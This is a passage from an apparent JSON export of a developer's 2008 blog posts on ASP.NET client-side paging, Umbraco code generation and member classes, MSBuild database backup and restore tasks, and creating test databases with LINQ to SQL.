The only weirdness is that the template must have a class named sys-template so the engine knows not to display it. As can be seen above, the JavaScript is also fairly easy to work with. In the Microsoft AJAX format you define the control, then use a pseudo-accessor to add the data, and then invoke a render.\nVery much like a .NET DataBinder control. I won't bother showing the request/response info as they are virtually identical to what was seen in the jTemplates example. Conclusion So now all our paging needs should be satisfied. We've seen standard UpdatePanel implementations, then made them as optimised as possible. And to finish it off we looked at doing it using JavaScript entirely (well, for display purposes it's entirely done :P). Hopefully this gives a useful insight into the world beyond ASP.NET. And to wrap it all up here's the sample project to play with yourself. ", "id": "2008-08-28-paging-data-client-side" }, { "title": "Mac is dead again", "url": "https://www.aaron-powell.com/posts/2008-08-21-mac-is-dead-again/", "date": "Thu, 21 Aug 2008 00:00:00 +0000", "tags": [ "mac" ], "description": "", "content": " Well, again my MBP is back at the repairer. I've been having intermittent issues with the keyboard and mouse since it was last repaired (on an unrelated matter) and finally I'd had enough. I took it down to the local Mac dealer and handed it over, to be told I'd be without it for around 10 days :( It's going to be a long 10 days, that's for sure... ", "id": "2008-08-21-mac-is-dead-again" }, { "title": "*Preview* - Umbraco interaction layer", "url": "https://www.aaron-powell.com/posts/2008-08-13-preview-umbraco-interaction-layer/", "date": "Wed, 13 Aug 2008 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " So I've been doing more and more work with the Umbraco API recently (particularly in regards to my website) but I'm getting more and more frustrated at the interaction which occurs at an API level (not to mention that it's rather ugly in some places). When you're working with documents which use extended document types (and how often will Id and Text be enough data?), you're constantly populating code with getProperty(alias) calls and performing null checks, default data handling, etc. This is why I wrote the Umbraco Member class, as members are the one thing that is most commonly interacted with from a code level. So to make it easier to interact with Umbraco documents at a code level I have a preview of the Umbraco Interaction Layer. The what? This project aims to create a code generator for Umbraco document types. It aims to take the complexity out of interacting with the Umbraco API.\nAnother goal is to bring Umbraco closer to a viable choice as a data storage mechanism, not just a CMS. Most projects I have worked across have had some form of Data content tree which contains content which is non-navigable, just CMS manageable, such as people profiles, news articles or photo gallery items. Quite frequently interacting with this Data content structure is done via .NET and via the Umbraco API. So having an easier way to interact with an actual representation of my document types at a code level would be a whole lot nicer. Preview At the moment I'm still in the early stages of development, but I thought it'd be nice to share. Let's say I have the following document type (it's actually one from my site and used in my Data content tree :P): Well, now I can generate some lovely .NET code, say C#? Or maybe you're a VB person?\nWell you can join in too!
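The generated output itself isn't shown in this archived version of the post, but a purely hypothetical sketch of the kind of class the generator produces might look like this; the class name, property names and the exact shape of the UmbracoInfo attribute are all made up for illustration.

using System;

// Hypothetical generated class: names and attribute parameters are illustrative only.
public partial class NewsArticle
{
    [UmbracoInfo(\"articleDate\")]
    public DateTime ArticleDate { get; set; }

    [UmbracoInfo(\"bodyText\")]
    public string BodyText { get; set; }

    [UmbracoInfo(\"author\")]
    public string Author { get; set; }
}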
You may notice all properties are decorated with an UmbracoInfo attribute; well, that will be used to provide feedback about how the object relates back to its Umbraco instance. Well, there we have it, a nice little tease of things to come ;) ", "id": "2008-08-13-preview-umbraco-interaction-layer" }, { "title": "ASP.NET Virtual Earth control", "url": "https://www.aaron-powell.com/posts/2008-08-13-aspnet-virtualearth-control/", "date": "Wed, 13 Aug 2008 00:00:00 +0000", "tags": [ "ajax", "asp.net" ], "description": "", "content": " So I was going through my blog feeds the other day and came across a post about the CTP release of an ASP.NET Virtual Earth server control (Channel9 video here). I'm doing quite a bit of work with Google Maps at the moment so I was interested in seeing what was available in this Microsoft incarnation. Well, to be honest I was really quite disappointed in the attitude of the people doing this, in regards to what an ASP.NET developer should be capable of knowing/doing. Essentially the control is an ASP.NET server control you put into your page and can program against using C# directly, rather than having to interact through JavaScript. Great idea in theory, poor idea in practice.\nThe video then goes on to show how \"cool\" it is to integrate with the UpdatePanel to \"completely remove the need to code JavaScript\". Sorry... what? There was also some comment along the lines that ASP.NET devs don't have the time to do JavaScript.\nAgain... what? I don't believe any good ASP.NET developer, or any web developer for that matter, can survive without having knowledge of JavaScript. For making rich web UIs it can't be beaten (unless you're going down the Flash/Silverlight path, but then they aren't entirely web UIs). Another thing was a glimpse of the source of the page and a quick scroll past the ViewState, which was... large.\nCombine a large ViewState with an UpdatePanel as they do and you're into a world of poor performance. Kudos to Microsoft for trying to make Virtual Earth more accessible to web developers, but poor form in thinking that an ASP.NET server control is the best way to go about it. ", "id": "2008-08-13-aspnet-virtualearth-control" }, { "title": "AaronPowell.MSBuild.Tasks v0.2", "url": "https://www.aaron-powell.com/posts/2008-08-09-aaronpowell-msbuild-tasks-v02/", "date": "Sat, 09 Aug 2008 00:00:00 +0000", "tags": [ "MSBuild" ], "description": "", "content": " Ok, well it's actually v0.2.3143.41238 but who's counting :P So I've got a new version of my MSBuild tasks ready, and in this new minor release I added a new namespace and two new tasks. The new namespace is AaronPowell.MSBuild.Tasks.Sql and the new tasks are DatabaseBackup and DatabaseRestore.\nI'm sure you're smart enough to work out what these two tasks do, but for those who are a little slow to catch on, here's a quick rundown. DatabaseBackup This task is designed to make it easier to back up a database as part of a build. It generates a Sql command, adds the appropriate parameters and then runs it nicely.\nYou can specify any location and filename to backup to, provided the Sql Server is able to connect to it to run the backup. Note - it only supports MS SQL servers and full database backups.
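The task's own source isn't included in the post, but conceptually a full backup boils down to something like the following sketch; this is an illustration of the idea rather than the actual task code, and the method and parameter names are made up.

using System.Data.SqlClient;

public static class BackupSketch
{
    // Illustrative only: roughly the command a full-backup task ends up executing.
    public static void BackupDatabase(string connectionString, string databaseName, string backupPath)
    {
        // The database name can't be parameterised, so it's embedded; the file path can be.
        string sql = \"BACKUP DATABASE [\" + databaseName + \"] TO DISK = @path WITH INIT\";

        using (SqlConnection connection = new SqlConnection(connectionString))
        using (SqlCommand command = new SqlCommand(sql, connection))
        {
            command.Parameters.AddWithValue(\"@path\", backupPath);
            command.CommandTimeout = 0; // backups can easily outlive the default 30 second timeout
            connection.Open();
            command.ExecuteNonQuery();
        }
    }
}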
DatabaseRestore This task is designed to restore a database from a backup; it is slightly more advanced as it requires a few more parameters, such as where to find the log and data files of the database (the full path on the Sql server). 
There are also two optional parameters: if the names of the data/log files within the backup need to be specified, they can be provided via the DataName and LogName properties. So there we go, two pretty new tasks. Get v0.2.3143.41238 now! ", "id": "2008-08-09-aaronpowell-msbuild-tasks-v02" }, { "title": "Extending Umbraco Members", "url": "https://www.aaron-powell.com/posts/2008-08-07-extending-umbraco-members/", "date": "Thu, 07 Aug 2008 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " Recently we've had several projects come through in which we are building a solution in Umbraco and the client wants to have memberships within the site. Umbraco 3.x has a fairly neat membership system but it's a bit limited when you want to interact with the member at a code level. Because members are just specialised nodes they can quite easily have custom properties put against them, but reading them in your code is less than appealing.\nYou've got to make sure you're reading from the correct alias, type checking, null checking, etc. As I kept finding I was writing the same code over and over again for reading and writing the properties, I thought I'd put together a small framework class. The framework requires the following Umbraco DLLs: businesslogic.dll cms.dll\nSo let's look at some sections of the class. Default Properties A member has a few default properties which are also built into the framework. There are also a few additional properties which the framework uses (such as the MembershipTypeId) which are coded in. All of the default properties are virtual so they can be overridden if so desired. An interesting addition I have made is the IsDirty property. This is used later on during the Save to ensure that only members whose data has actually changed are saved back into Umbraco. This limits database hits and improves performance. Constructors I've found that there are 3 really useful constructors, a new member constructor and two existing member constructors. What you'll notice from this is that the constructor which takes an Umbraco member is actually marked as private. This is because the framework is targeted at multi-tiered applications, like MVC/MVP, where you want to keep data layers separate from the others. And by doing this you can avoid having the Umbraco DLLs included in any other project in your solution. Next you'll notice a call to the method PopulateCustomProperties; this is an abstract method which you need to implement yourself to populate your own properties on a membership object. Saving Obviously this is an important aspect, and by default the framework already has the saving of the default properties configured. There is also an abstract method called PrepareMemberForSaving which can be used for preparing an Umbraco membership object for saving to the database. Notice the use of the IsDirty flag to ensure we're only saving what we should save. Helper Methods I've provided a few helper methods which can be used for the reading and writing of custom properties on the Umbraco membership object. The two get methods handle the null and default data checking, along with casting back to the appropriate data type. Here's an example implementation: The save is really just a shortcut; I was sick of typing out the same command every time. To use it you would call it from the PrepareMemberForSaving method like so: And we're done So there you have it, a simple little class for creating a .NET implementation of an Umbraco member.
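To give a feel for how the pieces described above fit together, here's a hypothetical subclass; the base class name (UmbracoMember) and the helper names (GetPropertyValue/SetPropertyValue) aren't spelled out in the post and are placeholders, but PopulateCustomProperties, PrepareMemberForSaving and IsDirty are the real extension points.

// Hypothetical sketch: base class and helper names are placeholders for the framework's real ones.
public class SiteMember : UmbracoMember
{
    private string firstName;

    public string FirstName
    {
        get { return firstName; }
        set { firstName = value; IsDirty = true; } // flag the member so only changed data gets saved
    }

    protected override void PopulateCustomProperties()
    {
        // The framework's get helpers handle the null/default checks and the casting
        firstName = GetPropertyValue<string>(\"firstName\");
    }

    protected override void PrepareMemberForSaving()
    {
        SetPropertyValue(\"firstName\", firstName);
    }
}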
There are two downloads available: Member.cs or a compiled DLL. It will be interesting, though, when Umbraco 4 ships and the membership model changes to use the ASP.NET membership providers... ", "id": "2008-08-07-extending-umbraco-members" }, { "title": "Unit Testing LINQ to SQL", "url": "https://www.aaron-powell.com/posts/2008-06-10-unit-testing-linq-to-sql/", "date": "Tue, 10 Jun 2008 00:00:00 +0000", "tags": [ "unit testing", "linq to sql" ], "description": "", "content": " Unit testing plays a vital role in development these days, and with recent developments in the .NET Framework and Visual Studio it is easier than ever to create unit tests. One pain point with unit testing a database-driven application is always the state of the database prior to the tests and after the tests. You have to make a call as to whether you have a separate database which you run your tests against, or use your primary database and potentially fill it with junk results all the time. I'm fairly familiar with the DataContext in LINQ to SQL, but as with all things there's always more to learn about, which a friend of mine pointed out to me the other day. More than just a connection The DataContext is more than just a connection manager for your database; it also contains information about your database and schema. Let me introduce two neglected methods of the DataContext: context.DatabaseExists() and context.CreateDatabase(). Because a DBML file has the full schema (well, the full known schema) your DataContext will know whether or not the database specified in your connection string actually exists, and you can create it yourself if needed. This is where unit testing comes in. Oh, and there is one other method which can be used as well if you want to do a complete clean up: context.DeleteDatabase(). So... unit testing? With unit testing you often don't care about the data created during the test; provided that all your Asserts are successful you can just delete it all when you're done. But you'll want to make sure that your CRUD is working, so you need somewhere to write to, and this is when we can pull out the CreateDatabase() method. Another idea which can be coupled with this is randomly-generated databases used purely for the test execution. Here's a sample test method I've got:

[TestMethod]
public void DatabaseTesting()
{
    string connstring = \"Data Source=apowell-vm-vist;Initial Catalog=TestDriven_\" + new Random().Next() + \";Integrated Security=True\";
    using (TDDDataContext ctx = new TDDDataContext(connstring))
    {
        if (ctx.DatabaseExists())
        {
            ctx.CleanDatabase();
        }
        else
        {
            ctx.CreateDatabase();
        }
    }
}

Oh - CleanDatabase() is an extension method I wrote just as an example, but you could do some Asserts to ensure the lookup data is already in there. As you can see from the example, I'm randomly generating a database name, cleaning the database if it already exists and creating it if it doesn't. So there you have it, simply creating test databases with LINQ to SQL :D ", "id": "2008-06-10-unit-testing-linq-to-sql" } ]